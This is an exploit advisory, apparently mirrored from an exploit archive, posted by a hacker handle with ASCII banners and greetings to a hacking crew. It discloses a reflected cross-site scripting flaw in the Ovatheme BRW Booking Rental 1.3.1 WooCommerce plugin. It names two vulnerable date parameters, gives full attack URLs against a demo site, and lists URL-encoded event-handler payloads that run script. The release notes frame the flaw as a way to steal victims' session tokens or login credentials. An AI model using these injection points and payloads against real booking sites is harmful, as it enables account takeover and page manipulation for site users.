## https://sploitus.com/exploit?id=PACKETSTORM:168496
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Exploits ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr :
โ Website : Ovatheme.com โ
โ Vendor : Ovatheme โ
โ Software : BRW - Booking Rental 1.3.1 Plugin WooCommerce โ
โ Vuln Type: Reflected XSS โ
โ Method : GET โ
โ Impact : Manipulate the content of the site โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ B4nks-NET irc.b4nks.tk #unix โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ The attacker can send to victim a link containing a malicious URL in an email or โ
โ instant message can perform a wide variety of actions, such as stealing the victim's โ
โ session token or login credentials โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2022 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
GET parameter 'ovabrw_pickup_date' is vulnerable to XSS
https://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=[XSS]&ovabrw_pickoff_date=&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=product
GET parameter 'ovabrw_pickoff_date' is vulnerable to XSS
https://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=&ovabrw_pickoff_date=[XSS]&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=product
Some XSS Payloads Reflected
bbb4l%22%20onfocus%3dalert(1)%20autofocus%3d%20q9s9y
ne503%22%20onfocus%3dalert(1)%20autofocus%3d%20sg1gu
[-] Done